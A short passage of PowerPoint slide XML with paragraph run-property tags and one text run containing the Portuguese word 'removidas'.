            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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removidas</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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